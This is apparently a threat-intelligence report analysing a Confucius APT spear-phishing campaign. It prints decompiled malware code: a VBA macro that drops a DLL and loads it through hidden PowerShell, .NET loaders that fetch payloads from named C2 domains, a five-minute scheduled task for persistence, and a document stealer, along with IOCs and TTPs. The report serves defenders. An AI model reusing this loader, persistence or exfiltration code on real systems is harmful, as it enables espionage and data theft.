Published: Tue 26 Oct, 21
Acknowledgements: Dr. Farrukh Shahzad
Table of Contents
Background
Confucius, an Indian state-sponsored APT group, continues to target Defense and Government organizations in South-Asia, especially Pakistan. The primary purpose of the TA appears to conduct espionage campaigns and steal information critical to the operations of the targeted institutes.
In August 2021, the release of Amnesty International’s advisory on Pegasus Spyware by Israel’s NSO Group was the source of major unrest in the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began to lure such individuals by means of a bi-partite email wherein the first email was a simple informational mail against Pegasus and the second email contained an encrypted document (with the password of the document mentioned in the same email). Technical analysis of the document and the entire attack chain points towards a well-thought espionage campaign, a new for Confucius.
In late September 2021, the same campaign was re-run wherein the only changes we witnessed were the domains which were used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:
Figure 1: Execution flow of complete attack chain
Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:
Macro-enabled Word Document
Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.
Using the Document_Open method, the macro executes two functions; one to write the binary to disk (eventually loading it) and the second to update the caption of an image embedded within the document. The function MyColor takes in the value of the Comments property of the active document, opens the handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.
Sub Mycolor()
Dim prop As DocumentProperty
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
s = prop.Value
End If
Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
Put #fnum, , abc(CStr(s))
Close #fnum
fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True
End SubSnippet 1: VBA Macros Embedded Inside Lure
Once written, the binary is loaded into memory using PowerShell’s implementation of the Reflection API (or more specifically, the LoadFile method in the class). The LoadFile method takes in one parameter which is the .NET assembly. Later, an object of Class1 is instantiated and the sadkj procedure is called.
.NET Downloader/Loader
Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.
public void sadkj()
{
string str = Path.GetTempPath() + "skfk.txt";
new Process
{
StartInfo =
{
FileName = "powershell.exe",
Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
Environment.Exit(0);
}Snippet 2: .NET Loader
This function is interesting as it references a URL to acquire (what looks like another DLL masqueraded as a .TXT file) a file from the C2 infrastructure. To summarize the function, it downloads the .TXT file from the URL referencing the domain inshaaldom.xyz, loads the assembly by converting the ASCII payload to binary via the moon function, acquires the types from the assembly, instantiates them and dynamically invokes the ndmsbfl function from the recently acquired assembly.
public void sdlfghjgks()
{
WebClient webClient = new WebClient();
string uriString = "https://inshaaldom.xyz/SowpnTdb.txt";
try
{
string sweiorut = webClient.DownloadString(new Uri(uriString));
Type[] types = Assembly.Load(this.moon(sweiorut)).GetTypes();
for (int i = 0; i < types.Length; i++)
{
object arg = Activator.CreateInstance(types[i]);
if (Class1.<>o__3.<>p__0 == null)
{
Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
}));
...
}Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler
.NET Task Scheduler
Static analysis of SowpnTdb.txt (DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\ILMerge\SowpnTdb.pdb (in one of the intrusions from the campaign) indicated several projects were in-line to continue the attack campaign. Several meta-data fields of the binary pointed towards it being a Task Scheduler, likely acquired from the GitHub. Recon on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows which was a direct match of the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We’ve also previously identified similar patterns of using open-source tools (OSTs) from their (potential) sister-group, Sidewinder.
Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.
public void ndmsbfl()
{
new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");
new TaskService();
TimeTrigger trigger = new TimeTrigger
{
Repetition = new RepetitionPattern(TimeSpan.FromMinutes(5.0), TimeSpan.FromDays(0.0), false)
};
string path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";
TaskService.Instance.AddTask("Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);
}Snippet 4: .NET Task Scheduler
Final .NET Loader
The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:
- Downloads another payload (Rwlksdnasjd.txt) from the domain, inshaaldom.xyz (a DLL masquerading as a TXT file)
- The payload is converted into binary
- Classes are instantiated from the recently converted binary
- The function,
sdsdjkfhds, is dynamically invoked
public void Nasuyd()
{
WebClient webClient = new WebClient();
string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";
try
{
string st = webClient.DownloadString(new Uri(uriString));
Type[] types = Assembly.Load(this.Houn(st)).GetTypes();
for (int i = 0; i < types.Length; i++)
{
object arg = Activator.CreateInstance(types[i]);
if (Class1.<>o__1.<>p__0 == null)
{
Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
}));
}
...
}Snippet 4: Final .NET loader
Stealer
Continuing the analysis with the last invoked function, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside the DLL further strengthen the fact that it is in fact an uploader. A snippet of the function is listed below:
public void sdsdjkfhds()
{
string userName = Environment.UserName;
List<string> pfhl = new List<string>();
string pattern = "*";
pfhl = this.Gpufh();
"C:\\\\Users\\\\" + userName;
string tdn = Environment.MachineName + "__" + userName;
this.CUD(tdn, 0);
foreach (string text in Directory.GetDirectories("C:\\Users\\"))
{
if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")
{
this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);
this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);
this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);
this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);
}
}
DriveInfo[] drives = DriveInfo.GetDrives();
char[] trimChars = new char[]
{
':',
'\\'
};
foreach (DriveInfo driveInfo in drives)
{
if (driveInfo.Name != "C:\\")
{
this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);
}
}
Environment.Exit(0);
}Snippet 5: Stealer and Uploader
Capabilities of the Stealer are:
- Collect information of all local drives
- Download a file of MD5 hashes (specific for the Machine and Username of the compromised workstation) from the C2 server
- Find and ex-filtrate files with extensions TXT, PDF, PNG, JPG, ODS, DOC, XLS, XLM, ODP, ODT, RTF, PPT, PPTX, XLSX, XLSM, DOCX, JPEG
- Files are hashed (MD5) before being ex-filtrated and compared against the MD5 hash list previously acquired from the C2 server. Files which have already been ex-filtrated are not uploaded to the server again.
private void GF(string path, string pattern, string ufn, List<string> pfhl)
{
...
try
{
list.AddRange(Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly));
foreach (string text in list)
{
...
if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")
{
list2.Add(text);
}
}
...
foreach (string text3 in list2)
{
if (!(text3 == ""))
{
string item;
using (MD5 md = MD5.Create())
{
using (FileStream fileStream = File.OpenRead(text3))
{
item = BitConverter.ToString(md.ComputeHash(fileStream)).Replace("-", "");
}
}
if (!pfhl.Contains(item))
{
list3.Add(text3);
list4.Add(item);
}
}
}
}
if (list3.Count != 0)
{
this.CUD(text2, 1);
...
}
...
}Snippet 6: Capabilities of the Stealer
Although the payload acquisition domain does encrypt its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz uses the plain-text HTTP protocol to send/receive data from the C2 server. Similar to the earlier campaigns carried out by Confucius, the web pages are written in PHP (with random URIs and parameter names to collect usernames/machine name). Since the task is scheduled for a five minute run, the uploader runs the same routine over and over, collecting files and folders from the system, until terminated.
Indicators of Compromise
Following Indicators of Compromise were discovered during the course of our intrusion analysis:
Files
| File Name | Type | Hash |
| Ticket00073146.docm | MD5 SHA1 SHA256 | a91be9529d06cd4a6c06a01b5c595630 814367a04163802d5e124e599772c6a3ba681a78 034cfe57d26cfea4139cf7bb387b9ba8f8705e44d3868e5edc36af0f7a8aa5bf |
| Tysdf.dll (skfk.txt) | MD5 SHA1 SHA256 | ae3e8679df2976d31da858fd7af67185 4c6c04af547b7df04e3bdb3f69e812a30b200016 ea7a951dbd93d5ef6ca535820499da29753331e1e8a38c6fef9398a57a679ef0 |
| Msdjkfh.dll (jksdfhk.txt) | MD5 SHA1 SHA256 | 5397cbaf89ff40a8b08004ac5164c8a0 17f1e33763cb6e5ae6b39f3f28bc695ac597ce7b bf50438e10e8ed3eaa7949440a6ac4bdc55305aa2bfe75fa1997feaf0cbc9d50 |
| Rwlksdnasjd.dll (Stealer) | MD5 SHA1 SHA256 | 457101ea5c30c53f9381d7e9aa6432a4 e554c0ef069fe5a49919bea560003cfccd69f858 43698d70087aa875c4384b59cacd8eff56bd0bff3be20e69b98613ec5184b41f |
| SowpnTdb.txt (Scheduler) | MD5 SHA1 SHA256 | 4461412acfc3988974355d4c1601d3f6 33596fbe26e556bb2610739f070b66a2cf532eda 63ca532a13ff909b4b7f72b9a094fa3fc59713984f645664c95a66f14be5f96a |
File Paths
| File Path | Description |
| %Temp%\skfk.txt | .NET DLL dropped by the Word document; used to load the next stage into memory |
| C:\ProgramData\jksdfhk.txt | .NET DLL dropped by SownpnTdb.dll; used to load the next stage into memory |
Scheduled Tasks
| Task Name | Task Occurence |
| Systemcheck | Every five minutes |
Domains/IPv4 Addresses
| Domain Name | Protocol | Usage | IPv4 Address |
| thakithaiya.xyz | HTTP | Exfiltration | 80.209.238.155 |
| pirnaram.xyz | HTTP | Exfiltration | 34.98.99.30, 62.77.153.51 |
| inshaaldom.xyz | HTTPS | Payload Acquisition | 104.21.10.162, 172.67.146.1 |
| parinari.xyz | HTTPS | Payload Acquisition | 34.98.99.30, 104.21.86.125, 172.67.219.211 |
YARA Rules
Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.
Tactics, Techniques and Procedures
Following tactics, techniques, and procedures are actively used by Confucius in their intrusions:
| Domain | ID | Name | Description |
| T1598 | Gather Victim Identity Information | Confucius extensively gathers the victim’s identifying information to target them via effective lures | |
| T1583 | Acquire Infrastructure | Confucius acquires new infrastructure (discussed in next techniques) a month before each new campaign | |
| T1583.001 | Acquire Infrastructure: Domains | Confucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to ex-filtrate data to | |
| T1583.004 | Acquire Infrastructure: Server | Confucius acquires virtual private servers to acquire payloads from and ex-filtrate data to during the Command and Control phase | |
| T1566 | Phishing/Spearphishing Attachment | Confucius heavily relies on Spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted; passwords being mentioned in the email’s content) by utilizing decoy documents including Payrolls, Pegasus (defenses against it), and others | |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Confucius schedules a Task on the compromised system to re-execute the malicious payload (every five minutes) | |
| T1036 | Masquerading | Dynamic-link Libraries (.DLL) files used by Confucius to load the payload from subsequent stages was masquerading as .TXT (plain-text) files on the filesystem | |
| T1083 | File and Directory Discovery | The final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and ex-filtrates the identified files to the C2 server | |
| T1082 | System Information Discovery | The final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration and later downloading hash lists for comparisons | |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Confucius heavily relies on the reflection API exposed by PowerShell to load/execute their DLLs in memory leaving minimal footprints on the compromised system’s disk | |
| T1005 | Data from Local System | Confucius collects data such as files and folders from the compromised system in an automated fashion to ex-filtrate to their server | |
| T1071.001 | Application Layer Protocol: Web Protocols | Confucius serves its command and control server using the web protocols, HTTP and HTTPS | |
| T1573.002 | Encrypted Channel: Asymmetric Cryptography | Confucius uses Asymmetric Cryptography to encrypt its communication over web protocols and communicate with the C2 server | |
| T1041 | Exfiltration over C2 Channel | Confucius ex-filtrates data collected from the compromised system to the C2 channel | |
| T1029 | Scheduled Transfer | Scheduled jobs also implement a schedule to transfer/ex-filtrate files from the compromised system and acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server |
Operational Security Failure
While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius highly utilizes C2 domains bought from the registrar, GoDaddy, using different US-based addresses to do so. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the campaign in August 2021, parinari.xyz, were both registered from Chandigarh, India. We consider this to be an operational mistake from the operators behind Confucius revealing their origin.
Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius
Outlook
The selection of techniques by Confucius are not very sophisticated at the moment along with some operational security failures however; analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.
Previous campaigns by Confucius utilized techniques like Template Injection in spear-phishing documents; However, the current campaign makes use of macros and an embedded PE in the comments of a picture inside the document. These minor changes in techniques suggest the group is actively looking to switch their tradecraft to avoid detections based on named rulesets.
